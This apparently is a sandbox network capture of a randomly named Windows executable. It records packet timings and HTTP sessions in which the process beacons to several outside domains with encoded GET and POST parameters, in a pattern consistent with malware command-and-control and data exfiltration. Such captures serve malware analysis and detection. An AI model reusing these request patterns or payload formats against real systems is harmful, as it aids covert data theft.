                                        Aug 27, 2024 08:43:51.707863092 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707875967 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707890987 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707987070 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.708014965 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.708014965 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.708103895 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.713010073 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.713023901 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.713037014 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.713051081 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.713205099 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.713205099 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.798999071 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.799017906 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.799031019 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.799038887 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.799257994 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.801855087 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.806631088 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:56.994050026 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:56.998920918 CEST805123013.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:56.999008894 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:57.018524885 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:57.023336887 CEST805123013.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:57.478491068 CEST805123013.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:57.481759071 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:58.530389071 CEST5123080192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:58.536541939 CEST805123013.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:59.549669981 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:59.554609060 CEST805123113.248.169.48192.168.2.6
                                        Aug 27, 2024 08:43:59.557327986 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:59.567925930 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:43:59.572712898 CEST805123113.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:00.019970894 CEST805123113.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:00.020291090 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:01.077394962 CEST5123180192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:01.082416058 CEST805123113.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.095964909 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:02.101058960 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.103971004 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:02.115555048 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:02.120395899 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.120537996 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.569612980 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:02.569669008 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:03.624248028 CEST5123280192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:03.629168034 CEST805123213.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:04.643311977 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:04.648122072 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:04.648186922 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:04.656879902 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:04.661648989 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:05.125711918 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:05.125731945 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:05.125859022 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:05.129309893 CEST5123380192.168.2.613.248.169.48
                                        Aug 27, 2024 08:44:05.134072065 CEST805123313.248.169.48192.168.2.6
                                        Aug 27, 2024 08:44:10.204369068 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:10.209234953 CEST805123484.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:10.209773064 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:10.221165895 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:10.226288080 CEST805123484.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:10.668118000 CEST805123484.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:10.668171883 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:11.733644962 CEST5123480192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:11.738523006 CEST805123484.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:12.752933979 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:12.759828091 CEST805123584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:12.759907007 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:12.775671959 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:12.780610085 CEST805123584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:13.238626957 CEST805123584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:13.244664907 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:14.281641006 CEST5123580192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:14.286813021 CEST805123584.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:15.299074888 CEST5123680192.168.2.684.32.84.32
                                        Aug 27, 2024 08:44:15.305619001 CEST805123684.32.84.32192.168.2.6
                                        Aug 27, 2024 08:44:15.309842110 CEST5123680192.168.2.684.32.84.32
                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        0 | 192.168.2.6 | 51193 | 92.204.210.213 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:41:50.896219969 CEST | 585 | OUT | GET /zbwq/?mvjDMBx8=yiu0kyrMDZDnaGSHUN6l2/AWenBEPojQbvIrsSiIoULw3Ja/Kxh4uhHPf3lVqybB3F8SgOCipbonbrybGxTRaMG4SCnpngzzUdFAxyNhxQ0Fwwko6x3YD+nfuTkI7r5rP6BNPZw=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.gate-eight.net
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:41:52.625930071 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 27 Aug 2024 06:41:51 GMT
                                        Server: Apache
                                        X-Powered-By: PHP/7.4.33
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        Retry-After: 86400
                                        Upgrade: h2,h2c
                                        Connection: Upgrade, close
                                        Vary: Accept-Encoding
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        Data Ascii: b3f<html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Gate 8 is under construction</title> <meta name="description" content="" /> <meta name="generator" content=" "> <link rel="stylesheet" href="https://fonts.bunny.net/css?family=Nunito:400,900"> <link rel="stylesheet" href="http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.01" type="text/css"><link rel="stylesheet" href="http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.01" type="text/css"><link rel="stylesheet" href="http://gate-eight.net/wp-content/plugins/under-construction-page/themes/light_bul
                                        Aug 27, 2024 08:41:52.625977993 CEST | 1236 | IN
                                        Data Ascii: b/style.css?v=4.01" type="text/css"><link rel="stylesheet" href="http://gate-eight.net/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=4.01" type="text/css"><link rel="icon" href="http://gate-eight.net/wp-content
                                        Aug 27, 2024 08:41:52.626043081 CEST | 448 | IN
                                        Data Ascii: ass="row" id="social"> <div class="col-xs-12 col-md-12 col-lg-12"> </div> </div> </div> <script src="http://gate-eight.net/wp-includes/js/jquery/jquery.min.js"></script> <script type=
                                        Aug 27, 2024 08:41:52.626077890 CEST | 318 | IN
                                        Data Ascii: removeClass('fadein').siblings().css({ position:'absolute' }); $('.fadein').mouseenter(function() { $('.fadein').stop().fadeTo(600, 0); }).mouseleave(function() { $('.fadein').stop().fadeTo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.6 | 51195 | 84.32.84.32 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:07.731540918 CEST | 858 | OUT | POST /zch2/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.glitterinthegrey.shop
                                        Origin: http://www.glitterinthegrey.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.glitterinthegrey.shop/zch2/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=XGRqet+7O+QL7W7uWuGFqdMpEMr5C6qKUceWfrwlpay0/Jge29Nj5sniehM4G6oOejio+bpMP3zpmVtCZIMWOAF5XY5tdAJe3/xW0bL6cJCOjIQ23wooWwOCcgtLyEHx7ZaffMYnJZ7KolZs0qp0GiT0A1dtiF6WXWOuDu4U5CWCSc+2oKalQldCEBaQEt/NH+uR51oqlxBr


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.6 | 51196 | 84.32.84.32 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:10.270353079 CEST | 882 | OUT | POST /zch2/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.glitterinthegrey.shop
                                        Origin: http://www.glitterinthegrey.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.glitterinthegrey.shop/zch2/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=XGRqet+7O+QL42ruVPGFo9MqYcr5ZKqOUcaWfqlipva0xLoe3/pj0MniLRM9MaoFeieW+eJMP3npmX1CZ/YROQF7Oo5vAwJe3/xW0bfQcNmOj5g23UErfQOFbgtL5kHt7ZaxfNVKJf/Kokps14BzMiTINVd/l3nOTHf1AfMUgCWhaK/s05aGC19AEDCiEN/nF+WRrikNqFkITEBftQODOWBh+UARHIu/ew==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.6 | 51197 | 84.32.84.32 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:12.815587044 CEST | 1895 | OUT | POST /zch2/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.glitterinthegrey.shop
                                        Origin: http://www.glitterinthegrey.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.glitterinthegrey.shop/zch2/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8= [TRUNCATED]


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.6 | 51198 | 84.32.84.32 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:15.358021975 CEST | 592 | OUT | GET /zch2/?mvjDMBx8=aE5KdauoI4Y2umflLKCriqVYTdzyJYOxKMaFRYlB9+Sv37Nuz5MD+L3RaAAlRIcvVgOa2tpXA3nWnQsvE78wTxh4OatPeg0Yh8Bm15yxUJXRh7FOvkM1aT2MQQJBhGDX4aCwZoM=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.glitterinthegrey.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:15.821510077 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Server: hcdn
                                        Date: Tue, 27 Aug 2024 06:42:15 GMT
                                        Content-Type: text/html
                                        Content-Length: 10072
                                        Connection: close
                                        Vary: Accept-Encoding
                                        alt-svc: h3=":443"; ma=86400
                                        x-hcdn-request-id: bfd5082ff85feb65d47ae3ab130c0d02-bos-edge1
                                        Expires: Tue, 27 Aug 2024 06:42:14 GMT
                                        Cache-Control: no-cache
                                        Accept-Ranges: bytes
                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                        Aug 27, 2024 08:42:15.821618080 CEST | 1236 | IN
                                        Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                        Aug 27, 2024 08:42:15.821630001 CEST | 1236 | IN
                                        Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                        Aug 27, 2024 08:42:15.821647882 CEST | 1236 | IN
                                        Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                        Aug 27, 2024 08:42:15.821660042 CEST | 1236 | IN
                                        Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                        Aug 27, 2024 08:42:15.821671009 CEST | 1120 | IN
                                        Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                        Aug 27, 2024 08:42:15.821676970 CEST | 1236 | IN
                                        Data Ascii: vers-at-hostinger rel=nofollow>Change nameservers</a></div></div></div></div></div><script>var punycode=new function(){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCod
                                        Aug 27, 2024 08:42:15.821682930 CEST | 1236 | IN
                                        Data Ascii: ror("punycode_bad_input(1)");if(v=e.charCodeAt(d++),o<=(s=v-48<10?v-22:v-65<26?v-65:v-97<26?v-97:o))throw RangeError("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-
                                        Aug 27, 2024 08:42:15.821687937 CEST | 640 | IN
                                        Data Ascii: ));g+=o)y.push(String.fromCharCode(e(s+(p-s)%(o-s),0))),p=Math.floor((p-s)/(o-s));y.push(String.fromCharCode(e(p,a&&w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.le


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.2.6 | 51199 | 194.58.112.174 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:20.942675114 CEST | 831 | OUT | POST /mjy7/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.indeks.space
                                        Origin: http://www.indeks.space
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.indeks.space/mjy7/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=RiVddwE6mCOzTxFelF0e4HGNeb+CgchdBUJhK0x532qaa8CoGGIt1Ay7xile9xqkltZCPww8/jMBS7koFEJuYr+VruAkS1btVveAc97xZnEriCP/z1/M+pSj9ThThn6PHQxgVADEeijJ3dVX77r+iqiekKyFr5JLoAU8CAz02YkmqAeWm3TJetObASiHxf2V1rFvSzt0g5lp
                                        Aug 27, 2024 08:42:21.627861977 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:21 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Aug 27, 2024 08:42:21.627893925 CEST | 1236 | IN
                                        Aug 27, 2024 08:42:21.627907038 CEST | 1236 | IN
                                        Aug 27, 2024 08:42:21.627919912 CEST | 109 | IN


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.6 | 51201 | 194.58.112.174 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:23.486563921 CEST | 855 | OUT | POST /mjy7/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.indeks.space
                                        Origin: http://www.indeks.space
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.indeks.space/mjy7/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Ascii: mvjDMBx8=RiVddwE6mCOzRRVekmMe+nGOdb+Cp8hZBUNhK2ch3FOaaZ+oHD8tyAy7pSkUzRqrltVwPxM8/jYBS/soE3RhY7+bkOAmfVbtVveAc5aUZk0rixX/yU/TiZSg1zhTw37GHQxWVBf+ehbJ3ZZX4qrxsqiUgKyXoJomiGc6djHKqeIHiWfM6ETqM9uZAQ61x/2/3r9vAkhTvNAKBA2ajfHD/O0XflZjxRVXBQ==
                                        Aug 27, 2024 08:42:24.196062088 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:24 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.2.6 | 51202 | 194.58.112.174 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:26.033678055 CEST | 1868 | OUT | POST /mjy7/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.indeks.space
                                        Origin: http://www.indeks.space
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.indeks.space/mjy7/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:26.760317087 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:26 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.6 | 51204 | 194.58.112.174 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:28.576951981 CEST | 583 | OUT | GET /mjy7/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=cg99eHdIhH6PRmBvzzsY4n38eZmBksl3PUY+KkgGmlThXL3WC2dP6WW67TtKoTiLnNtMIhIq0So6UKQjTmNbIq3Et/8UbAXoANeZC4OXTx0MozCDv0bkromw6gd6nEy8FhxsXmw= HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.indeks.space
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:29.260879040 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:29 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Ascii: 293d<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.indeks.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" [TRUNCATED]


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.2.6 | 51205 | 119.28.49.194 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Aug 27, 2024 08:42:35.134093046 CEST | 849 | OUT | POST /dk4s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cs0724sd92jj.cloud
                                        Origin: http://www.cs0724sd92jj.cloud
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.cs0724sd92jj.cloud/dk4s/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:36.018942118 CEST | 406 | IN | HTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:35 GMT
                                        Content-Type: text/html
                                        Content-Length: 162
                                        Connection: close
                                        Location: https://www.cs0724sd92jj.cloud/dk4s/
                                        Strict-Transport-Security: max-age=31536000
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        10 | 192.168.2.6 | 51206 | 119.28.49.194 | 80 | 5700 | C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        Timestamp | Bytes transferred | Direction | Data
